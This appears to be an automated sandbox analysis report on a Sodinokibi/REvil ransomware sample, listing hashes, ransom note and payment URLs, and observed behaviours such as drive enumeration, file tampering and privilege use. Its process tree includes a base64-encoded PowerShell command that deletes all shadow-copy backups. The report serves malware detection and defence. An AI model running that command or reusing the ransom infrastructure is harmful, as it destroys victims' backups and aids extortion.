Resubmissions
16-06-2024 14:39
240616-r1f9ys1dpj 10Analysis
-
max time kernel
92s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
16-06-2024 14:39
Static task
static1
Behavioral task
behavioral1
Sample
b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe
Resource
win10v2004-20240611-en
General
-
Target
b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe
-
Size
166KB
-
MD5
b4070a6d33fd166e115bd0cb2268b7ca
-
SHA1
9f8510cee0c696b3c986c619b012acd19db9a7e7
-
SHA256
4dd6435f7a4bf6b1ce2e3479230e6d1f9b8730000d3c261ceb3457407bffb701
-
SHA512
3137b62656a2aee8b65f6dd0e4c79818044bc973f99af878875a3e0fc1a3ab97cea8cd8eaf68377c86840ae680f285893d485c3f521304be0d99751b3a7498dc
-
SSDEEP
3072:1LFrb30BRtBZZg+i2ayy2RjLTuVyu7CJDgoMT3QvOYiEyYFarnufJIIn:ZJ0BXScFy2RsQJ8zgZyYFaifx
Malware Config
Extracted
C:\Users\9deog592-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6B4B5870DF576762
http://decryptor.cc/6B4B5870DF576762
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\S: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\Z: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\A: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\K: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\L: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\Y: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\B: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\G: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\F: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\M: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\T: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\U: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\J: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\R: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\W: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\X: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\D: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\E: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\H: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\I: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\N: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\P: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\Q: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened (read-only) \??\V: b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7wg7zhsq68.bmp" b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe -
Drops file in Program Files directory 32 IoCs
description ioc Process File opened for modification \??\c:\program files\UninstallRepair.WTV b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\SearchEnable.mpeg b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\TraceGrant.mp2 b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\ConvertToPop.pptx b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\LimitMerge.midi b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\OutCompare.kix b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\SuspendRestore.M2V b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\UnpublishCopy.ppt b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\WriteUnprotect.mp4 b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File created \??\c:\program files (x86)\9deog592-readme.txt b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\ConvertFromUse.m3u b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\TraceUse.txt b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\BackupInvoke.jpg b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\ReceiveAssert.tiff b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\ResolveTest.avi b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\CompleteSkip.mp2v b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\RenameRead.csv b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\EnterSearch.mp4 b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\UndoRead.otf b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\UnpublishSelect.wmf b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\BackupRevoke.temp b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\DismountResolve.wmv b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\ReadMeasure.otf b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\ShowTrace.vstx b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\StartGet.3gpp b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\UnlockProtect.rtf b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File created \??\c:\program files\9deog592-readme.txt b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\ProtectSkip.dib b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\ProtectResize.vb b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\CopySet.jfif b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\GetDismount.vstx b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe File opened for modification \??\c:\program files\OpenApprove.pdf b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3440 b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe 3440 b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe 2804 powershell.exe 2804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3440 b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe Token: SeDebugPrivilege 2804 powershell.exe Token: SeBackupPrivilege 2280 vssvc.exe Token: SeRestorePrivilege 2280 vssvc.exe Token: SeAuditPrivilege 2280 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 3440 wrote to memory of 2804 3440 b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe 85 PID 3440 wrote to memory of 2804 3440 b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe 85 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\b4070a6d33fd166e115bd0cb2268b7ca_JaffaCakes118.exe"1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:4700
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2280
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD50539913193a6ec547812feaed994036b
SHA19f423cb2c36f49aea6d6a28dd3ae245cc97a2715
SHA2564c08e0d4f4f5f49e57ca5fe92ae5f86aaf2cd403979ccb0f63ddbbf647bab295
SHA51245058fcc4a8aa1ac54fd79227426a5d269170844c96d62a0d2e350d16e821a8df470368ce68db0310cf3c57220fd6314709c90b9dc1ca7d2bff4f4be564dfbe5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82